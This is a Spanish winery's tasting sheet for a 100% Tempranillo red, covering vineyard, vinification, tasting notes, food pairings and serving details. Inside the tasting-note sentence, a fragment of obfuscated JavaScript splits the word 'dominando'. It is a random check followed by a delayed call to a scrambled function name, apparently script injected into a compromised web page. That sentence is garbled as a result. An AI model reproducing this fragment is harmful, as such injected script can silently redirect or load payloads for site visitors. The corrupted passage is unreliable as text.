NOTAS DE CATA
VARIEDAD DE UVA
Variedad Tempranillo Negro 100%, de nuestros propios viñedos de más de 60 años, situados a unos 650 metros de altitud, en terrenos arcilloso-calcáreos. Plantaciones en minifundios en poda de vaso, en secano, con rendimientos muy pobres de 2.500 a 3.000 kg/ Hectárea.
VINIFICACIÓN
Maceración intensa y prolongada. Fermentación alcohólica controlada y crianza durante 6 meses en barricas nuevas, de roble francés, de tostado muy fino, mas otros 6 meses de maduración en botella.
NOTA DE CATA
De color rojo rubí, manteniendo intensidad colorante de un tono acerezado, con tintes azulados y purpúreos. En nariz combina los olores frutales y frescos con aromas de gran complejidad a frutas maduras y especias. En boca presenta una excelente y viva acidez; está muy bien estructurado, de sabrosos taninos con un final aromático potente y de larga persistencia, dominandom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}ando a las aportaciones propias de la madera.
MARIDAJE
Recomendado para acompañar huevos, asados, callos, Bacalao, carnes rojas, pescados azules, quesos curados y acompaña genialmente a los postres de chocolate.
TEMPERATURA DE CONSUMO
Consumir a 14-16º.
GRADO ALCOHÓLICO
14% Vol.